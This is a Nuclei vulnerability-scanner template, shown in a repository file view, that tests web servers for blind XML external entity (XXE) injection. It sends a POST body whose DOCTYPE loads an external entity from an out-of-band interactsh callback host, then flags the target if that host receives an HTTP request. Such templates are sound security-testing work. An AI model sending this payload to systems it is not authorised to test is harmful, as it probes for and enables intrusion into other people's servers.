nuclei-templates/vulnerabilities/generic/generic-blind-xxe.yaml

26 lines
515 B
YAML
Raw Normal View History

2021-08-17 11:48:52 +00:00
id: generic-blind-xxe
info:
name: Generic Blind XXE
author: geeknik
severity: high
tags: xxe,generic
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: {{BaseURL}}
2021-08-20 11:07:22 +00:00
2021-08-17 11:48:52 +00:00
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
<foo>&e1;</foo>
matchers:
- type: word
part: interactsh_protocol
words:
- "http"